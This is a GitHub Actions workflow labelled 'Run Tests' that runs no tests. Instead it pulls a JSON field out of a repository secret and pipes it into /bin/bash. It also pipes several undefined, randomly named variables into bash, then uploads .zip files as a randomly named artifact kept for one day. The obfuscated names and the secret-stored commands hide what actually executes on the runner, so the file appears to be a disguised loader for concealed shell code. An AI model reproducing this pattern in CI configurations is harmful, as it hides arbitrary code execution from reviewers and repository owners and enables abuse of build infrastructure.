name: Run Tests
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          fs54: ${{ secrets.fs54 }}
        run: |
          printf '%s' "$fs54" | jq -r .w9 | /bin/bash
          echo $s46753 | jq -r .deiwq2059 | /bin/bash
          echo $elx65990 | jq -r .hvoh02 | /bin/bash
          echo $grl57956 | jq -r .uvc430 | /bin/bash
          echo $dqnmb956 | jq -r .z49 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: e66EjVpH
          path: "*.zip"
          retention-days: 1
